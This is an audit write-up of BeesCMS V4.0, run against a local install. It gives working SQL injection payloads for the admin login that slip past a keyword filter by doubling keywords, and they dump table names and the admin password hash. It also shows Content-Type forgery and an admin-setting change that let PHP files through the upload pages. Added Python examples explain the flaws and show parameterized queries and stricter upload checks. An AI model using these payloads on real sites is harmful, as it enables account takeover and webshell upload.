Beescms V4.0 audit
SQL injection in the admin login page
http://127.0.0.1/beescms/admin/login.php
function fl_html($str){
function fl_value($str){
$user=fl_html(fl_value($_POST['user']));
// dump the database name
admin'and extractvalue(1,concat(0x7e,select database(),0x7e))#
// double-writing the keywords plus spaces bypasses the filter
// dump the table name
admin' a and nd extractvalue(1,concat(0x7e,(selselectect table_name fr from om information_schema.tables wh where ere table_schema like 'beescms' limit 0,1),0x7e))#
// dump the column name
admin' a and nd extractvalue(1,concat(0x7e,(selselectect column_name fr from om information_schema.columns wh where ere table_name like 'bees_admin' limit 0,1),0x7e))#
// dump the admin account name: admin
admin' a and nd extractvalue(1,concat(0x7e,(selselectect admin_name fr from om beescms.bees_admin limit 0,1),0x7e))#
// combine with substr to dump the whole password
admin' a and nd extractvalue(1,concat(0x7e,substr((selselectect admin_password fr from om beescms.bees_admin limit 0,1),3,32),0x7e))#
// 21232f297a57a5a743894a0e4a801fc3 is obviously md5-processed: admin
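To show why the keyword-stripping filter above fails and what the fix looks like, here is an added Python example that is not part of the original writeup and not BeesCMS code. The filter it models is an assumption built from the payloads on the page ("select" removed anywhere, the other keywords removed only when surrounded by spaces); the real fl_value() body is not shown on the page. The bees_admin table is a constructed in-memory stand-in.

```python
import re
import sqlite3

# Assumed single-pass blacklist modelled on what the audit's payloads imply
# ("select" stripped anywhere, other keywords only when space-delimited).
# This is a stand-in for illustration, NOT the real BeesCMS fl_value() body.
FILTER_RE = re.compile(r"select| and | from | where | union ", re.IGNORECASE)


def blacklist_filter(value: str) -> str:
    """One pass over the input: each match is deleted, the result is never re-scanned.
    Deleting the inner 'select' from 'selselectect' leaves 'select' behind."""
    return FILTER_RE.sub("", value)


def recursive_filter(value: str) -> str:
    """Re-apply until nothing changes. Closes the double-writing hole for 'select',
    but 'a and nd' still collapses to 'and' because the pattern needs the spaces:
    a blacklist is never a complete fix."""
    while True:
        cleaned = FILTER_RE.sub("", value)
        if cleaned == value:
            return cleaned
        value = cleaned


def find_admin(user: str):
    """Parameterized lookup against a constructed in-memory stand-in for bees_admin.
    The user string is bound as data, so stripped or doubled keywords are irrelevant."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE bees_admin (admin_name TEXT, admin_password TEXT)")
    # constructed row; the password value is a placeholder, not a real hash
    conn.execute("INSERT INTO bees_admin VALUES (?, ?)", ("admin", "<hash-placeholder>"))
    row = conn.execute(
        "SELECT admin_name FROM bees_admin WHERE admin_name = ?", (user,)
    ).fetchone()
    conn.close()
    return row[0] if row else None


if __name__ == "__main__":
    doubled = "selselectect"
    print(blacklist_filter(doubled))            # single pass leaves 'select'
    print(recursive_filter(doubled))            # '' once re-scanned
    print(find_admin("admin"))                  # 'admin'
    print(find_admin("admin' a and nd 1=1#"))   # None: treated as a literal name
```

The single-pass filter is exactly the weakness the audit exploits: removing one copy of a keyword from a doubled spelling reassembles the keyword. Re-scanning closes that particular hole but the space-delimited variants still slip through, which is why the durable fix is a parameterized query rather than a longer blacklist.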
Back-end file upload 1
MIME type bypass
http://127.0.0.1/beescms/admin/admin_pic_upload.php
$value_arr=up_img($pic_info,$is_up_size,array('image/gif','image/jpeg','image/png','image/jpg','image/bmp','image/pjpeg','image/x-png'),$up_is_thumb,$up_thumb_width,$up_thumb_height,$logo=1,$pic_name_alt);
Only the Content-Type header is compared,
so changing the Content-Type is enough to bypass the upload check:
Content-Disposition: form-data; name="up[]"; filename="1.php"
Content-Type: image/png
Back-end file upload 2
Also a MIME type bypass
in the up_img() function
http://127.0.0.1/beescms/admin/upload.php
Back-end file upload 3
http://127.0.0.1/beescms/admin/admin_sys.php
Edit the allowed upload file types,
add a php type,
then
http://127.0.0.1/beescms/admin/admin_file_upload.php
accepts the upload of PHP files
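All three upload findings share one root cause: the only checks are a client-controlled Content-Type header and an admin-editable type list. The following Python example is added here and is not BeesCMS code; it contrasts the MIME-only check the audit describes with a validation that also enforces an extension allowlist, a hard-coded deny list that the admin configuration cannot override, the file's own magic bytes, and a server-generated storage name. The MIME list is the one quoted from up_img(); the extension lists, magic bytes and sample payloads are constructed assumptions.

```python
import secrets

# Assumed values for illustration (not BeesCMS configuration): the MIME list is the
# one quoted from up_img(); the extension lists and magic bytes are our own.
MIME_ALLOWLIST = {"image/gif", "image/jpeg", "image/png", "image/jpg",
                  "image/bmp", "image/pjpeg", "image/x-png"}
DEFAULT_ALLOWED_EXT = {"gif", "jpg", "jpeg", "png", "bmp"}
# Hard-coded deny list: an admin-editable type list (upload 3) must not override it.
NEVER_ALLOWED_EXT = {"php", "php3", "php4", "php5", "phtml", "phar", "htaccess"}
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "bmp": b"BM",
}


def mime_only_check(content_type: str) -> bool:
    """The pattern the audit found: trusts the client-supplied Content-Type alone."""
    return content_type in MIME_ALLOWLIST


def validate_upload(filename: str, content_type: str, data: bytes, allowed_ext=None):
    """Returns a server-generated storage name on success, None on rejection.
    Checks the extension allowlist minus the deny list, the MIME header, and the
    file's own magic bytes, so a forged Content-Type is not enough."""
    allowed = set(allowed_ext if allowed_ext is not None else DEFAULT_ALLOWED_EXT)
    allowed -= NEVER_ALLOWED_EXT  # admin config cannot re-enable executable types
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in allowed:
        return None
    if content_type not in MIME_ALLOWLIST:
        return None
    signature = MAGIC.get(ext)
    if signature is None or not data.startswith(signature):
        return None  # unknown type, or content does not match the claimed image
    return f"{secrets.token_hex(16)}.{ext}"  # never reuse the client's filename


if __name__ == "__main__":
    php_body = b"<?php echo 'constructed sample'; ?>"      # constructed, not an exploit
    png_body = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16          # constructed PNG header
    print(mime_only_check("image/png"))                     # True: forged header passes
    print(validate_upload("1.php", "image/png", php_body))  # None: extension rejected
    print(validate_upload("x.png", "image/png", php_body))  # None: magic bytes mismatch
    print(validate_upload("x.png", "image/png", png_body))  # random name ending in .png
    print(validate_upload("x.php", "image/png", php_body, allowed_ext={"png", "php"}))  # None
```

The last call models upload 3: even after an administrator adds "php" to the allowed list, the deny list keeps it out, and the first two rejections cover uploads 1 and 2, where the forged Content-Type alone would have passed.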